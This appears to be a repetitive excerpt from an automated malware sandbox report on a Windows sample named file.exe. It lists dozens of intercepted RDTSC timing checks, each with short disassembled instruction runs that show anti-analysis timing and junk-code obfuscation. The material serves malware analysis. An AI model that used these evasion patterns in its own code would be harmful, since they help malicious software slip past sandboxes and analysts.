                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8598 second address: 6E861F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F488D0453F6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 jnl 00007F488D045400h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jmp 00007F488D0453FAh 0x00000025 pop eax 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F488D0453F8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 lea ebx, dword ptr [ebp+1244D357h] 0x00000046 mov dword ptr [ebp+122D36F2h], edi 0x0000004c xchg eax, ebx 0x0000004d push edi 0x0000004e jmp 00007F488D045400h 0x00000053 pop edi 0x00000054 push eax 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E861F second address: 6E8623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E873A second address: 6E8740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E87D6 second address: 6E87E4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E87E4 second address: 6E8806 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a and dl, 00000075h 0x0000000d push 00000000h 0x0000000f adc edi, 651EDE26h 0x00000015 call 00007F488D0453F9h 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8806 second address: 6E8843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F488C756CF6h 0x0000000a popad 0x0000000b jmp 00007F488C756CFFh 0x00000010 popad 0x00000011 push eax 0x00000012 jbe 00007F488C756D02h 0x00000018 jmp 00007F488C756CFCh 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jng 00007F488C756D00h 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAC4F second address: 6FAC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708289 second address: 708290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7083CB second address: 7083CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7083CF second address: 7083D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708532 second address: 708544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488D0453FEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708544 second address: 70854C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708987 second address: 708993 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F488D0453F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708993 second address: 708999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708999 second address: 70899F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B33 second address: 708B40 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B40 second address: 708B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F488D045401h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B5C second address: 708B7F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007F488C756CF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F488C756D04h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B7F second address: 708B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708B87 second address: 708B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708CBA second address: 708CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F488D0453F6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708E26 second address: 708E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756D03h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708E3D second address: 708E48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708E48 second address: 708E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F488C756D03h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709507 second address: 70950B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70950B second address: 709511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709511 second address: 70951C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70951C second address: 709521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C59 second address: 709C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71004F second address: 71005F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71005F second address: 710066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7146CC second address: 7146D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713A77 second address: 713A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713A7B second address: 713A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F488C756CFAh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713DA0 second address: 713DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F488D04540Ah 0x00000014 jmp 00007F488D0453FEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713DC4 second address: 713DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F488C756CF6h 0x0000000c js 00007F488C756CF6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714425 second address: 714429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71456A second address: 714581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756CFDh 0x00000009 jc 00007F488C756CF6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714581 second address: 714585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716165 second address: 7161C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F488C756D00h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jo 00007F488C756CF6h 0x00000014 pop eax 0x00000015 pushad 0x00000016 jno 00007F488C756CF6h 0x0000001c jp 00007F488C756CF6h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [esp+04h] 0x00000028 pushad 0x00000029 push ebx 0x0000002a pushad 0x0000002b popad 0x0000002c pop ebx 0x0000002d ja 00007F488C756CF8h 0x00000033 popad 0x00000034 mov eax, dword ptr [eax] 0x00000036 jmp 00007F488C756D00h 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f jp 00007F488C756D00h 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7165AB second address: 7165B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716740 second address: 716744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716744 second address: 71674A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71674A second address: 716750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716750 second address: 716754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716754 second address: 716770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F488C756CFDh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716770 second address: 716776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716E84 second address: 716ECF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F488C756CF8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jl 00007F488C756CFAh 0x0000002b mov di, A86Fh 0x0000002f push eax 0x00000030 pushad 0x00000031 jl 00007F488C756CFCh 0x00000037 jnl 00007F488C756CF6h 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716F9F second address: 716FA9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F488D0453F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FA9 second address: 716FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F488C756CF6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FB3 second address: 716FC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F488D045400h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717255 second address: 717268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756CFFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71735A second address: 717360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717360 second address: 71736A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719E8C second address: 719EE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ecx 0x0000000d xor esi, dword ptr [ebp+122D17A6h] 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F488D0453F8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D1EECh] 0x00000036 push 00000000h 0x00000038 mov di, ax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719EE8 second address: 719EEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B52F second address: 71B54A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F488D045401h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B54A second address: 71B550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B550 second address: 71B554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721B61 second address: 721BC5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F488C756CFAh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F488C756CF8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F488C756CF8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D38B0h], eax 0x00000051 push eax 0x00000052 push edi 0x00000053 push eax 0x00000054 push edx 0x00000055 push esi 0x00000056 pop esi 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720C6B second address: 720D20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F488D045407h 0x0000000f jmp 00007F488D045402h 0x00000014 popad 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 sub ebx, dword ptr [ebp+122D29DEh] 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F488D0453F8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov ebx, dword ptr [ebp+122D35E5h] 0x0000004d mov edi, edx 0x0000004f mov eax, dword ptr [ebp+122D0339h] 0x00000055 or edi, dword ptr [ebp+122D29AEh] 0x0000005b push FFFFFFFFh 0x0000005d nop 0x0000005e jmp 00007F488D045406h 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720D20 second address: 720D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F488C756CF6h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722C65 second address: 722CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 adc di, 5C9Fh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F488D0453F8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D2E89h], esi 0x0000002f push 00000000h 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007F488D0453FCh 0x0000003a jmp 00007F488D045403h 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CC3 second address: 722CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488C756CFBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722E32 second address: 722E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723EC6 second address: 723ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724BF5 second address: 724BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723ECC second address: 723EDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F488C756CF8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722EE3 second address: 722EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723EDF second address: 723EE4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D59 second address: 726D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D5D second address: 726D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D61 second address: 726D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D6B second address: 726D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F488C756CFCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726D7B second address: 726D85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F488D0453F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D928B second address: 6D9297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F488C756CF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9297 second address: 6D92B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F488D045409h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7275D0 second address: 7275D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7275D4 second address: 7275DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729514 second address: 729530 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F488C756CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F488C756D00h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729530 second address: 72956D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a ja 00007F488D0453F6h 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D251Fh], edi 0x00000019 pushad 0x0000001a pushad 0x0000001b sub cl, FFFFFFE7h 0x0000001e mov ebx, dword ptr [ebp+122D2B26h] 0x00000024 popad 0x00000025 mov cl, 89h 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c mov ebx, 0C378E5Bh 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jnc 00007F488D0453F6h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72956D second address: 729572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B6B3 second address: 72B6B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C701 second address: 72C705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C705 second address: 72C70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D824 second address: 72D828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
